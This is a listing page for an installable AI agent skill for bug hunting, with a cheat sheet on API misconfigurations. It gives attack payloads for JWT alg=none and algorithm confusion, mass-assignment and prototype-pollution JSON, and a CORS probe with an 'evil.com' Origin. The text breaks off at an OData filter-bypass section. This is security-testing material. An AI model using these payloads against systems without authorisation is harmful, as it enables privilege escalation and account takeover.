← ClaudeAtlas

hunt-api-misconfig (listed)

Hunt API security misconfiguration — mass assignment, JWT attacks, prototype pollution, CORS, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT: alg=none, weak HMAC bruteforce, kid path traversal, JWK injection, token confusion. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge → polluted prototype reaches sink (RCE in Node, XSS in browser). CORS: wildcard with credentials, null origin, regex with subdomain takeover, postMessage origin checks. HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io), CORS preflight responses. Use when hunting API misconfigs, JWT flaws, mass-assignment, prototype pollution, CORS bypasses.
elementalsouls/Claude-BugHunter · ★ 1,478 · API & Backend · score 83
Install: claude install-skill elementalsouls/Claude-BugHunter
## 12. API SECURITY MISCONFIGURATION

### Mass Assignment

```javascript
User.update(req.body) // body has {"role": "admin"} → privilege escalation
```

### JWT None Algorithm

```python
header = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "."  # no signature
```

### JWT RS256 → HS256 Algorithm Confusion

```python
# Get server's public key from /.well-known/jwks.json
# Sign token with public key as HMAC secret
token = jwt.encode({"sub": "admin", "role": "admin"}, pub_key, algorithm="HS256")
# Server uses RS256 key as HS256 secret → accepts it
```

### Prototype Pollution

```javascript
// Server-side — Node.js merge without protection
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
// URL: ?__proto__[isAdmin]=true&__proto__[role]=superadmin
```

### CORS Exploitation

```bash
# Test: reflected origin + credentials
curl -s -I -H "Origin: https://evil.com" https://target.com/api/user/me
# If: Access-Control-Allow-Origin: https://evil.com + Access-Control-Allow-Credentials: true
# → CRITICAL: attacker reads credentialed responses
```

---

## OData $filter / $select / $expand WAF-Blacklist Bypass (2024-2026 surface)

OData (Open Data Protocol) is the query layer behind **SharePoint, Microsoft Dynamics 365 / Power Platform, SAP NetWeaver Gateway / Fiori,** and any ASP.NET WebAPI project using `Microsoft.AspNetCore.OData`. It exposes SQL-shaped query operators (`eq`, `ne`, `and`,